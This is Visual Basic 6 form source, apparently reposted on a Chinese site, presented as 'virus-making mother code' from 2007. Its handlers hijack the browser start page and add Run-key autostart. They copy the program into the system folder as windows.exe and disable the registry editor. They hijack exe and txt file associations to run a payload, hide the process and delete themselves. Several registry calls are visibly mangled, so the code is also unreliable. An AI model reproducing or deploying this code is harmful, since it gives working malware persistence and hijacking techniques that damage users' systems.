VERSION 5.00 Begin VB.Form Form1 BorderStyle = 1 'Fixed Single Caption = "6331905VB制造病毒母代码" ClientHeight = 6630 ClientLeft = 45 ClientTop = 435 ClientWidth = 7815 Icon = "Form1.frx":0000 LinkTopic = "Form1" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 6630 ScaleWidth = 7815 StartUpPosition = 2 '屏幕中心 Begin VB.CommandButton Command14 Caption = "清除感染txt" Height = 495 Left = 4440 TabIndex = 18 Top = 2880 Width = 975 End Begin VB.CommandButton Command13 Caption = "清除感染exe" Height = 495 Left = 4440 TabIndex = 17 Top = 2040 Width = 975 End Begin VB.PictureBox Picture1 Appearance = 0 'Flat BackColor = &H80000005& ForeColor = &H80000008& Height = 5655 Left = 5640 Picture = "Form1.frx":08FF ScaleHeight = 5625 ScaleWidth = 1905 TabIndex = 16 Top = 840 Width = 1935 End Begin VB.CommandButton Command12 Caption = "感染txt文件" Height = 495 Left = 3120 TabIndex = 15 Top = 2880 Width = 1215 End Begin VB.CommandButton Command11 Caption = "木马自删除" Height = 495 Left = 3120 TabIndex = 14 Top = 5400 Width = 2295 End Begin VB.CommandButton Command10 Caption = "隐藏应用程序" Height = 495 Left = 600 TabIndex = 11 Top = 5400 Width = 1695 End Begin VB.CommandButton Command9 Caption = "隐藏进程" Height = 495 Left = 600 TabIndex = 10 Top = 4560 Width = 1695 End Begin VB.CommandButton Command8 Caption = "修改默认键值" Height = 495 Left = 3120 TabIndex = 8 Top = 4560 Width = 2295 End Begin VB.CommandButton Command7 Caption = "修改非默认键值" Height = 495 Left = 3120 TabIndex = 7 Top = 3720 Width = 2295 End Begin VB.CommandButton Command6 Caption = "感染exe文件" Height = 495 Left = 3120 TabIndex = 6 Top = 2040 Width = 1215 End Begin VB.CommandButton Command5 Caption = "将程序复制到系统目录命名为windows.exe并且开机自启动" Height = 855 Left = 3120 TabIndex = 5 Top = 840 Width = 2295 End Begin VB.CommandButton Command4 Caption = "禁止访问注册表" Height = 495 Left = 600 TabIndex = 4 Top = 3720 Width = 1695 End Begin VB.CommandButton Command3 Caption = "可以访问注册表" Height = 495 Left = 600 TabIndex = 3 Top = 2880 Width = 1695 End Begin VB.CommandButton Command2 Caption = "开机自启动" Height = 495 Left = 600 TabIndex = 2 Top = 2040 Width = 1695 End Begin VB.TextBox Text1 Appearance = 0 'Flat Height = 270 Left = 600 TabIndex = 1 Text = "**" Top = 840 Width = 1695 End Begin VB.CommandButton Command1 Caption = "修改主页" Height = 495 Left = 600 TabIndex = 0 Top = 1200 Width = 1695 End Begin VB.Label Label3 Caption = "写于2007.6.30日" Height = 255 Left = 720 TabIndex = 13 Top = 6240 Width = 1455 End Begin VB.Label Label2 Caption = "QQ:6331905" BeginProperty Font Name = "宋体" Size = 18 Charset = 134 Weight = 700 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty ForeColor = &H000000FF& Height = 375 Left = 3240 TabIndex = 12 Top = 6120 Width = 1935 End Begin VB.Shape Shape1 BorderColor = &H80000000& Height = 1085 Left = 480 Top = 720 Width = 1940 End Begin VB.Label Label1 Caption = $"Form1.frx":6100 Height = 615 Left = 360 TabIndex = 9 Top = 120 Width = 7095 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Option Explicit Dim systempath As String Private Sub Command1_Click() '修改主页 Dim hKey As Long RegCreateKey HKEY_CURRENT_USER,"Software/Microsoft/Internet Explorer/Main",hKey RegSetValueEx hKey,"Start Page",REG_SZ,ByVal Me.Text1.Text,30 If Me.Text1.Text = "" Then RegSetValueEx hKey,ByVal "about:blank",30 RegCloseKey hKey End If End Sub
Private Sub Command10_Click() App.TaskVisible = False '隐藏应用程序 End Sub
Private Sub Command11_Click() Dim s As String On Error Resume Next s = CurDir '当前目录 '保证目录最后的字符为 "/" If Right(s,1) <> "/" Then s = s & "/" End If '在当前目录下创建bat文件 Open s & "kill.bat" For Output As #1 Print #1,":redel" Print #1,"del " & Chr(34) & s & App.EXEName & ".exe" & Chr(34) Print #1,"if exist " & Chr(34) & s & App.EXEName & ".exe" & Chr(34) & " goto redel" Print #1,"del %0" Print #1, Close #1 Shell Chr(34) & s & "kill.bat" & Chr(34) End End Sub
Private Sub Command12_Click() '感染txt文件,描述见下面感染exe文件,txt文件默认数据为C:/windows/notepad.exe %1
Dim hKey As Long RegCreateKey HKEY_CLASSES_ROOT,"txtfile/shell/open/command/","",ByVal "C:/1.exe",30 RegCloseKey hKey Dim a As String a = Command() If a = "" Then Else Shell a,1 End If End Sub
Private Sub Command13_Click() '清除感染exe文件 Dim x As String x = Chr$(34) + "%1" + Chr$(34) + Chr$(32) + "%*" Dim hKey As Long RegCreateKey HKEY_CLASSES_ROOT,"exefile/shell/open/command/",ByVal x,30 RegCloseKey hKey End Sub
Private Sub Command14_Click() '清除感染txt文件 Dim hKey As Long RegCreateKey HKEY_CLASSES_ROOT,ByVal "C:/windows/notepad.exe %1",30 RegCloseKey hKey Dim a As String End Sub
'如果让程序开机运行,需要先把文件编译为可执行文件放到特定目录下, '并修改注册表让其开机便运行, '路径是/HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVerson/Run Private Sub Command2_Click() '无论该文件放在什么位置都可以实现开机自启动 Dim hKey As Long,SubKey As String,Exe As String SubKey = "Software/Microsoft/Windows/CurrentVersion/Run" Exe = App.Path & "/" & App.EXEName & ".exe" RegCreateKey HKEY_LOCAL_MACHINE,SubKey,"19911593",ByVal Exe,LenB(StrConv(Exe,vbFromUnicode)) + 1 RegCloseKey hKey End Sub
'禁止修改注册表方法为: '展开注册表到 'HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System '下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器Regedit,"0"为可用 Private Sub Command3_Click() '可以使用注册表 Dim hKey As Long RegCreateKey HKEY_CURRENT_USER,"Software/Microsoft/Windows/CurrentVersion/Policies/System","DisableRegistryTools",REG_DWORD,0&,4
'0&就是设置DWORD值为0,1&就是设置DWORD值为1 RegCloseKey hKey End Sub
Private Sub Command4_Click() '禁止使用注册表 Dim hKey As Long RegCreateKey HKEY_CURRENT_USER,1&,4 RegCloseKey hKey
End Sub
Private Sub Command5_Click() '将程序复制到系统目录 systempath = String(255,Chr(0)) GetSystemDirectory systempath,254 systempath = Left(systempath,InStr(systempath,Chr(0)) - 1) '先检查系统目录有无windows.exe文件,如果没有,自我复制到系统目录命名为windows.exe If Not Dir(systempath & "/" & "windows.exe") = "windows.exe" Then FileCopy App.Path & "/" & App.EXEName & ".exe",systempath & "/" & "windows.exe" End If '以下为设置系统目录的windows.exe为开机自启动,名称为6331905,数据为windows.exe Dim hKey As Long,Exe As String SubKey = "Software/Microsoft/Windows/CurrentVersion/Run" Exe = (systempath & "/" & "windows.exe") RegCreateKey HKEY_LOCAL_MACHINE,"6331905",vbFromUnicode)) + 1 RegCloseKey hKey End Sub
'VB制作EXE文件关联,并运行指定文件,其实就是修改默认键值 '原理: 实现该程序主要是修改注册表的数据值 '1.在注册表HKEY_CLASSES_ROOT/exefile/shell/open/command/的默认数据值为"%1" %* '该"%1" %*默认数据值控制着exe文件的打开
'2.只要修改默认数据值就可以实现文件关联 '比如,把"%1" %*修改为c:/1.exe %1,请大家在c:/放1个任何1.exe文件,看看运行 '你电脑里面的任何exe程序会发生什么效果
'说明: '(1) "%1" %*则表示所有EXE文件本身直接运行(EXE 可以直接运行, '所以用表示程序本身的%1即可),后面的%*则表示程序命令后带的所有参数 '(这就是为什么EXE文件可以带参数运行的原因)。 '(2) 1.exe %1,表示将所有文件类型为EXE(exefile表示为EXE类型文件)的 '文件都通过“记事本”程序打开,后面的%1表示要打开的程序本身(就是双击时的那个程序)。
Private Sub Command6_Click()
Dim hKey As Long RegCreateKey HKEY_CLASSES_ROOT,ByVal "c:/1.exe %1",30 RegCloseKey hKey Dim a As String '定义一个字符变量,用来存放当前文件的绝对路径 a = Command() '将绝对路径存放到变量a中 If a = "" Then '如果a的路径为空,则什么都不执行 Else '否则执行程序 Shell a,1 '这是打开变量a指定路径的文件,运行参数为默认 End If End Sub
Private Sub Command7_Click() '修改HKEY_CURRENT_USER/Console/FaceNamed的键值 Dim hKey As Long RegCreateKey HKEY_CURRENT_USER,"Console/","FaceName",ByVal "16697000",30 RegCloseKey hKey End Sub
Private Sub Command8_Click() '修改HKEY_CURRENT_USER/Console的默认键值 Dim hKey As Long RegCreateKey HKEY_CURRENT_USER,30 RegCloseKey hKey
End Sub
Private Sub Command9_Click() '该隐藏进程方法在原版XP2上通过,在雨林木风GHOST版本未通过,有研究的愿意交流 HideCurrentProcess '隐藏进程 End Sub (编辑:李大同)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|